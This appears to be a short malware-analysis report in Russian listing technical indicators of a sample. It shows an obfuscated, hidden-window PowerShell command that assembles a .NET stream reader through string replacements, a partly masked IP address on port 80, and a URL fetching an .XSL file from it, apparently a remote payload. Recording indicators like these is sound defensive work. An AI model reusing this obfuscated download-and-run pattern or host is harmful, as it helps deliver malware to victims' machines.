Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $JSEFRQJSPVDRGROZOPFGFR = '[S=@$61=&}$$_%5[89!65EM.I{<$)98^$0%<3#^6[4!/{<=MREAdER]'.Replace('=@$61=&}$$_%5[89!65','ySt').Replace('{<$)98^$0%<3#^6[4!/{<=','O.StREA');$KXHDZPGEELCJCKFVFQWWAL = ...
- '23.##6.123.171':80
- http://23.##6.123.171/3425467565645425367/234567877654367586.XSL
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $JSEFRQJSPVDRGROZOPFGFR = '[S=@$61=&}$$_%5[89!65EM.I{<$)98^$0%<3#^6[4!/{<=MREAdER]'.Replace('=@$61=&}$$_%5[89!65','ySt').Replace('{<$)98^$0%<3#^6[4!/{<=','O.StREA');$KXHDZPGEELCJCKFVFQWWAL = ...' (со скрытым окном)